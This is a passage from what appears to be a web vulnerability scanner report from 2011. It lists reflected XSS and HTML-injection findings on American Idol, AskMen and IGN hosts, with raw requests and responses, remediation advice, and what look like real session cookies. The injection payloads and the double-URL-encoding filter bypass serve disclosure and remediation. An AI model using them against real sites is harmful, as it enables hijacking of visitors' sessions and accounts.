Path:   /tools/keyslave.one'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000046)%3C/script%3E

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript identifier: the response is served as application/javascript and declares function oneWidgetWaitForCookie_tools<value>/keyslave.one...(), with the value spliced in unescaped. The scanner classified the context as a JavaScript string encapsulated in single quotation marks. The payload 96f76%2527%253balert%25281%2529%252f%252fd1bbe2ce575 was submitted in the REST URL parameter 1. This input was echoed as 96f76';alert(1)//d1bbe2ce575 in the application's response.

This proof-of-concept shows that quotes, semicolons and slashes reach a script context unmodified. Because the landing point is a function name rather than a string literal, the breakout as echoed leaves the declaration syntactically invalid, so confirm execution in a browser before rating this as exploitable on the strength of the echo alone.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character: the web server decodes it once to %3c, which passes the filter, and the application then decodes it again to <.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /tools96f76%2527%253balert%25281%2529%252f%252fd1bbe2ce575/keyslave.one'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000046)%3C/script%3E HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: widgets.myidol.americanidol.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 4290
Content-Type: application/javascript
Expires: Tue, 04 Oct 2011 21:32:30 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 21:32:30 GMT
Connection: close

       function oneWidgetWaitForCookie_tools96f76';alert(1)//d1bbe2ce575/keyslave.one'"--></style><_script>html_removednetsparker(0x000046)<_script>() {
           ckCntr++;
           if (ckCntr > 12) {
                                           //
...[SNIP]...
<_script>').style.display = 'block';
                                   }
           else {
               // Wait some more if ckCookieSet has not been set to true
               if (!oneCkCookieSet_tools96f76';alert(1)//d1bbe2ce575/keyslave.one'"-->
...[SNIP]...

1.107. http://widgets.myidol.americanidol.com/tools/keyslave.one/%22ns=%22netsparker(0x00004A) [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://widgets.myidol.americanidol.com
Path:   /tools/keyslave.one/%22ns=%22netsparker(0x00004A)

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 40f41%2527%253balert%25281%2529%252f%252f79209a69875 was submitted in the REST URL parameter 1. This input was echoed as 40f41';alert(1)//79209a69875 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /tools40f41%2527%253balert%25281%2529%252f%252f79209a69875/keyslave.one/%22ns=%22netsparker(0x00004A) HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: widgets.myidol.americanidol.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 3862
Content-Type: application/javascript
Expires: Tue, 04 Oct 2011 21:32:36 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 21:32:36 GMT
Connection: close

       function oneWidgetWaitForCookie_tools40f41';alert(1)//79209a69875_keyslave.one_"ns="netsparker(0x00004A)() {
           ckCntr++;
           if (ckCntr > 12) {
                                           // Show redirect button
                           document
...[SNIP]...
Wait some more if ckCookieSet has not been set to true
               if (!oneCkCookieSet_tools40f41';alert(1)//79209a69875_keyslave.one_"ns="netsparker(0x00004A)) {
                   setTimeout(oneWidgetWaitForCookie_tools40f41';alert(1)//79209a69875_keyslave.one_"ns="netsparker(0x00004A), 400);
               }
           }
       }
       function oneWidgetRedirStart() {
           document.cookie = "owrstart=1; expires=0; path=/";
           return;
       }
       function oneWidgetRedirAlready
...[SNIP]...

1.108. http://widgets.myidol.americanidol.com/tools/keyslave.one/%22ns=%22netsparker(0x00004A) [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://widgets.myidol.americanidol.com
Path:   /tools/keyslave.one/%22ns=%22netsparker(0x00004A)

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 3c294%253balert%25281%2529%252f%252f0410001729d was submitted in the REST URL parameter 1. This input was echoed as 3c294;alert(1)//0410001729d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /tools3c294%253balert%25281%2529%252f%252f0410001729d/keyslave.one/%22ns=%22netsparker(0x00004A) HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: widgets.myidol.americanidol.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 3844
Content-Type: application/javascript
Expires: Tue, 04 Oct 2011 21:32:36 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 21:32:36 GMT
Connection: close

       function oneWidgetWaitForCookie_tools3c294;alert(1)//0410001729d_keyslave.one_"ns="netsparker(0x00004A)() {
           ckCntr++;
           if (ckCntr > 12) {
                                           // Show redirect button
                           document.
...[SNIP]...

1.109. http://widgets.myidol.americanidol.com/tools/keyslave.one/%2522ns%253D%2522netsparker%25280x00004B%2529) [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://widgets.myidol.americanidol.com
Path:   /tools/keyslave.one/%2522ns%253D%2522netsparker%25280x00004B%2529)

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 95bdb%2527%253balert%25281%2529%252f%252f959d5468c2 was submitted in the REST URL parameter 1. This input was echoed as 95bdb';alert(1)//959d5468c2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /tools95bdb%2527%253balert%25281%2529%252f%252f959d5468c2/keyslave.one/%2522ns%253D%2522netsparker%25280x00004B%2529) HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: widgets.myidol.americanidol.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 3894
Content-Type: application/javascript
Expires: Tue, 04 Oct 2011 21:32:40 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 21:32:40 GMT
Connection: close

       function oneWidgetWaitForCookie_tools95bdb';alert(1)//959d5468c2_keyslave.one_"ns="netsparker(0x00004B))() {
           ckCntr++;
           if (ckCntr > 12) {
                                           // Show redirect button
                           document
...[SNIP]...
Wait some more if ckCookieSet has not been set to true
               if (!oneCkCookieSet_tools95bdb';alert(1)//959d5468c2_keyslave.one_"ns="netsparker(0x00004B))) {
                   setTimeout(oneWidgetWaitForCookie_tools95bdb';alert(1)//959d5468c2_keyslave.one_"ns="netsparker(0x00004B)), 400);
               }
           }
       }
       function oneWidgetRedirStart() {
           document.cookie = "owrstart=1; expires=0; path=/";
           return;
       }
       function oneWidgetRedirAlread
...[SNIP]...

1.110. http://widgets.myidol.americanidol.com/tools/keyslave.one/%2522ns%253D%2522netsparker%25280x00004B%2529) [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://widgets.myidol.americanidol.com
Path:   /tools/keyslave.one/%2522ns%253D%2522netsparker%25280x00004B%2529)

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload ea7bb%253balert%25281%2529%252f%252fd66f8c5aaae was submitted in the REST URL parameter 1. This input was echoed as ea7bb;alert(1)//d66f8c5aaae in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /toolsea7bb%253balert%25281%2529%252f%252fd66f8c5aaae/keyslave.one/%2522ns%253D%2522netsparker%25280x00004B%2529) HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: widgets.myidol.americanidol.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 3886
Content-Type: application/javascript
Expires: Tue, 04 Oct 2011 21:32:41 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 21:32:41 GMT
Connection: close

       function oneWidgetWaitForCookie_toolsea7bb;alert(1)//d66f8c5aaae_keyslave.one_"ns="netsparker(0x00004B))() {
           ckCntr++;
           if (ckCntr > 12) {
                                           // Show redirect button
                           document
...[SNIP]...

1.111. http://wrapper.askmen.com/a [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://wrapper.askmen.com
Path:   /a

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 7407a<script>alert(1)</script>3466efce8f4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /a?size=prestitial&network_name_override=askmen&channel_name_override=Homepage&pagetype=am_channel&rf=http%3A%2F%2Fwww.newscorp.com&r=http$3A$2F$2Fwww$2Enewscorp$2Ecom$2Foperations$2Fother$2Ehtml$23&7407a<script>alert(1)</script>3466efce8f4=1 HTTP/1.1
Host: wrapper.askmen.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.askmen.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATA=askmen.131775351301803.50.23.123.106; s_vi=[CS]v1|2745A955050126E8-40000108E05B8422[CE]; __utma=173688037.2045369409.1317753551.1317753551.1317756136.2; __utmz=173688037.1317756136.2.2.utmcsr=askmen.com|utmccn=(referral)|utmcmd=referral|utmcct=/; s_pers=%20s_nr%3D1317753573453%7C1320345573453%3B%20s_lv%3D1317756138497%7C1412364138497%3B%20s_lv_s%3DLess%2520than%25201%2520day%7C1317757938497%3B; __utma=238685328.1799806713.1317753548.1317753548.1317756116.2; __utmz=238685328.1317756116.2.2.utmcsr=newscorp.com|utmccn=(referral)|utmcmd=referral|utmcct=/operations/other.html; NGUserID=a5d4238-2366-2041309540-1; rsi_segs=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 20:06:11 GMT
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html;charset=UTF-8
P3P: CP="NOI ADMa OUR STP"
Set-Cookie: NGUserID=175e5;Path=/;Domain=.askmen.com;Expires=Wed, 02-Apr-31 20:06:11 GMT
Set-Cookie: freq=c-1317758771058v-1n-29mc+1317758770952mv+0mn+0wwe~0;Path=/;Domain=.askmen.com
Content-Length: 1799


if((typeof ataxscript == 'undefined' || ataxscript.length == 0) &&
(typeof ataximg == 'undefined' || ataximg.length == 0) &&
(typeof showStitial == 'undefined' || !showStitial) &&
(typeof
...[SNIP]...
<"+"script src='http://atax.askmen.com/size=1x1&network=fim&site=askmen&dechannel=askmen&subdomain=www.askmen.com&hosted_id=7700&channel_name_override=Homepage&7407a<script>alert(1)</script>3466efce8f4=1&network_name_override=askmen&pagetype=am_channel&rf=http$253A$252F$252Fwww.newscorp.com&r=http$253A$252F$252Fwww.newscorp.com$252Foperations$252Fother.html$2523&PageId=1317758771058&random=131775877
...[SNIP]...

1.112. http://wrapper.ign.com/a [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://wrapper.ign.com
Path:   /a

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 7101a<script>alert(1)</script>8b9ff9ff23 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /a?size=text&Loc=ign.com&pagetype=stitial&dechannel=ign&7101a<script>alert(1)</script>8b9ff9ff23=1 HTTP/1.1
Host: wrapper.ign.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://xboxlive.ign.com/articles/119/1197949p1.html?5214a%22-alert(1)-%22db381a54140=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NGUserID=a5d4238-2360-1891746812-2; optimizelyEndUserId=oeu1317753405502r0.8151182061992586; ATA=ign.131775336947702.50.23.123.106; s_vi=[CS]v1|2745A90C850101BD-40000105605A2661[CE]; optimizelyBuckets=%7B%7D; __utma=173446715.1859606147.1317753406.1317756133.1317758813.3; __utmz=173446715.1317758813.3.3.utmcsr=newscorp.com|utmccn=(referral)|utmcmd=referral|utmcct=/operations/other.html; s_pers=%20s_nr%3D1317753576005%7C1320345576005%3B%20s_lv%3D1317758813760%7C1412366813760%3B%20s_lv_s%3DLess%2520than%25201%2520day%7C1317760613760%3B; rsi_segs=; freq=c-1317763380671v-97n-12mc+1317763380671mv+97mn+12wwe~0

Response

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 22:02:39 GMT
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html;charset=UTF-8
P3P: CP="NOI ADMa OUR STP"
Set-Cookie: freq=c-1317763380671v-97n-12mc+1317763380671mv+97mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 73166

if(typeof showStitial == 'undefined' || !showStitial){
if(typeof adString == 'undefined') var adString = "";

var tileDate = new Date();
var tile = tileDate.getTime();
var isLinked
...[SNIP]...
<"+"script type='text/javascript' src='http://a.ign-omy.com/js.ng/size=text&network=fim&site=ign&subdomain=xboxlive.ign.com&hosted_id=0&channel_id=58&dechannel=ign&7101a<script>alert(1)</script>8b9ff9ff23=1&pagetype=stitial&reginsider=a&PageId=1317765759443&random=1317765759443&country2=us&server=media-adwrapper-prd-app-01.las1.colo.ignops.com&rsi_segs=&property=ign&tile="+tile+"'>
...[SNIP]...

1.113. http://wrapper.ign.com/a [pagetype parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://wrapper.ign.com
Path:   /a

Issue detail

The value of the pagetype request parameter is copied into the HTML document as plain text between tags. The payload 38ef8<script>alert(1)</script>7c600bdd0ef was submitted in the pagetype parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /a?size=text&Loc=ign.com&pagetype=stitial38ef8<script>alert(1)</script>7c600bdd0ef&dechannel=ign HTTP/1.1
Host: wrapper.ign.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://xboxlive.ign.com/articles/119/1197949p1.html?5214a%22-alert(1)-%22db381a54140=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NGUserID=a5d4238-2360-1891746812-2; optimizelyEndUserId=oeu1317753405502r0.8151182061992586; ATA=ign.131775336947702.50.23.123.106; s_vi=[CS]v1|2745A90C850101BD-40000105605A2661[CE]; optimizelyBuckets=%7B%7D; __utma=173446715.1859606147.1317753406.1317756133.1317758813.3; __utmz=173446715.1317758813.3.3.utmcsr=newscorp.com|utmccn=(referral)|utmcmd=referral|utmcct=/operations/other.html; s_pers=%20s_nr%3D1317753576005%7C1320345576005%3B%20s_lv%3D1317758813760%7C1412366813760%3B%20s_lv_s%3DLess%2520than%25201%2520day%7C1317760613760%3B; rsi_segs=; freq=c-1317763380671v-97n-12mc+1317763380671mv+97mn+12wwe~0

Response

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 22:02:29 GMT
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html;charset=UTF-8
P3P: CP="NOI ADMa OUR STP"
Set-Cookie: freq=c-1317763380671v-97n-12mc+1317763380671mv+97mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 73475

if(typeof showStitial == 'undefined' || !showStitial){
if(typeof adString == 'undefined') var adString = "";

var tileDate = new Date();
var tile = tileDate.getTime();
var isLinked
...[SNIP]...
ght 1997-2008 Omniture, Inc. More info available at
http://www.omniture.com */

/* You may give each page an identifying name, server, and channel on
the next lines. */
s.pageName="ign:ign:stitial38ef8<script>alert(1)</script>7c600bdd0ef";        /* Page Name */
s.server=location.host;
s.prop1="";
s.prop2="ign";            /* Network */
s.prop3="ign";            /* Channel */
s.prop4="stitial38ef8<script>
...[SNIP]...

1.114. http://www.americanidol.com/photos/hothome/ [all parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.americanidol.com
Path:   /photos/hothome/

Issue detail

The value of the all request parameter is copied into the HTML document as plain text between tags. The payload 638f0<a>0a93004fbcc was submitted in the all parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /photos/hothome/?feed=1&all=true638f0<a>0a93004fbcc HTTP/1.1
Host: www.americanidol.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html, application/xml, text/xml, */*
Referer: http://www.americanidol.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2745A99E051D1536-4000010A2004AB28[CE]; owrstart=1; AkamaiAnalyticsDO_bitRateBucketsCsv=0,0,0,0,0,0,0,0; AkamaiAnalytics_VisitLastCloseTime=1317758795349; AkamaiAnalyticsDO_visitMetricsCsv=; core_u=faa976043c793de66165b83afd81de19; core_x=3e3d8fc3a1227dd8404b22789c1bc64d; core_anon=1; session_exp=0; __utma=124250778.1498354944.1317753547.1317756115.1317758789.3; __utmb=124250778.2.10.1317758789; __utmc=124250778; __utmz=124250778.1317758789.3.3.utmcsr=newscorp.com|utmccn=(referral)|utmcmd=referral|utmcct=/operations/other.html; AkamaiAnalyticsDO_visitStartTime=1317758835936; AkamaiAnalytics_VisitCookie=1; AkamaiAnalytics_BrowserSessionId=0B27D3C17992E7F2224154EED4161CFBB1FCDC34; AkamaiAnalytics_VisitIsPlaying=1; s_pers=%20s_vnum%3D1320123600884%2526vn%253D3%7C1320123600884%3B%20s_invisit%3Dtrue%7C1317760700435%3B%20s_dayslastvisit%3D1317758900484%7C1412366900484%3B%20s_dayslastvisit_s%3DLess%2520than%25201%2520day%7C1317760700484%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: application/xml
Vary: Accept-Encoding
Expires: Tue, 04 Oct 2011 20:13:05 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Tue, 04 Oct 2011 20:13:05 GMT
Content-Length: 16409
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:media="http://search.yahoo.com/mrss/" xmlns:atom="http://www.w3.org/2005/Atom">
<channel>
<title>HOT PHOTOS</title>
<description></
...[SNIP]...
<![CDATA[http://www.americanidol.com/photos/hothome/?feed=1&all=true638f0<a>0a93004fbcc]]>
...[SNIP]...

1.115. http://www.americanidol.com/photos/hothome/ [feed parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.americanidol.com
Path:   /photos/hothome/

Issue detail

The value of the feed request parameter is copied into the HTML document as plain text between tags. The payload 89dc6<a>edda9f5fe41 was submitted in the feed parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /photos/hothome/?feed=189dc6<a>edda9f5fe41&all=true HTTP/1.1
Host: www.americanidol.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html, application/xml, text/xml, */*
Referer: http://www.americanidol.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2745A99E051D1536-4000010A2004AB28[CE]; owrstart=1; AkamaiAnalyticsDO_bitRateBucketsCsv=0,0,0,0,0,0,0,0; AkamaiAnalytics_VisitLastCloseTime=1317758795349; AkamaiAnalyticsDO_visitMetricsCsv=; core_u=faa976043c793de66165b83afd81de19; core_x=3e3d8fc3a1227dd8404b22789c1bc64d; core_anon=1; session_exp=0; __utma=124250778.1498354944.1317753547.1317756115.1317758789.3; __utmb=124250778.2.10.1317758789; __utmc=124250778; __utmz=124250778.1317758789.3.3.utmcsr=newscorp.com|utmccn=(referral)|utmcmd=referral|utmcct=/operations/other.html; AkamaiAnalyticsDO_visitStartTime=1317758835936; AkamaiAnalytics_VisitCookie=1; AkamaiAnalytics_BrowserSessionId=0B27D3C17992E7F2224154EED4161CFBB1FCDC34; AkamaiAnalytics_VisitIsPlaying=1; s_pers=%20s_vnum%3D1320123600884%2526vn%253D3%7C1320123600884%3B%20s_invisit%3Dtrue%7C1317760700435%3B%20s_dayslastvisit%3D1317758900484%7C1412366900484%3B%20s_dayslastvisit_s%3DLess%2520than%25201%2520day%7C1317760700484%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: application/xml
Vary: Accept-Encoding
Expires: Tue, 04 Oct 2011 20:13:04 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Tue, 04 Oct 2011 20:13:04 GMT
Content-Length: 16409
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:media="http://search.yahoo.com/mrss/" xmlns:atom="http://www.w3.org/2005/Atom">
<channel>
<title>HOT PHOTOS</title>
<description></
...[SNIP]...
<![CDATA[http://www.americanidol.com/photos/hothome/?feed=189dc6<a>edda9f5fe41&all=true]]>
...[SNIP]...

1.116. http://www.americanidol.com/photos/hothome/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.americanidol.com
Path:   /photos/hothome/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload ef2e2<a>0d1a3c47574 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /photos/hothome/?feed=1&all=true&ef2e2<a>0d1a3c47574=1 HTTP/1.1
Host: www.americanidol.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html, application/xml, text/xml, */*
Referer: http://www.americanidol.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2745A99E051D1536-4000010A2004AB28[CE]; owrstart=1; AkamaiAnalyticsDO_bitRateBucketsCsv=0,0,0,0,0,0,0,0; AkamaiAnalytics_VisitLastCloseTime=1317758795349; AkamaiAnalyticsDO_visitMetricsCsv=; core_u=faa976043c793de66165b83afd81de19; core_x=3e3d8fc3a1227dd8404b22789c1bc64d; core_anon=1; session_exp=0; __utma=124250778.1498354944.1317753547.1317756115.1317758789.3; __utmb=124250778.2.10.1317758789; __utmc=124250778; __utmz=124250778.1317758789.3.3.utmcsr=newscorp.com|utmccn=(referral)|utmcmd=referral|utmcct=/operations/other.html; AkamaiAnalyticsDO_visitStartTime=1317758835936; AkamaiAnalytics_VisitCookie=1; AkamaiAnalytics_BrowserSessionId=0B27D3C17992E7F2224154EED4161CFBB1FCDC34; AkamaiAnalytics_VisitIsPlaying=1; s_pers=%20s_vnum%3D1320123600884%2526vn%253D3%7C1320123600884%3B%20s_invisit%3Dtrue%7C1317760700435%3B%20s_dayslastvisit%3D1317758900484%7C1412366900484%3B%20s_dayslastvisit_s%3DLess%2520than%25201%2520day%7C1317760700484%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: application/xml
Vary: Accept-Encoding
Expires: Tue, 04 Oct 2011 20:13:07 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Tue, 04 Oct 2011 20:13:07 GMT
Content-Length: 16412
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:media="http://search.yahoo.com/mrss/" xmlns:atom="http://www.w3.org/2005/Atom">
<channel>
<title>HOT PHOTOS</title>
<description></
...[SNIP]...
<![CDATA[http://www.americanidol.com/photos/hothome/?feed=1&all=true&ef2e2<a>0d1a3c47574=1]]>
...[SNIP]...

1.117. http://www.americanidol.com/videos/hot/qty/12 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.americanidol.com
Path:   /videos/hot/qty/12

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload c4217<a>ba34a50088c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

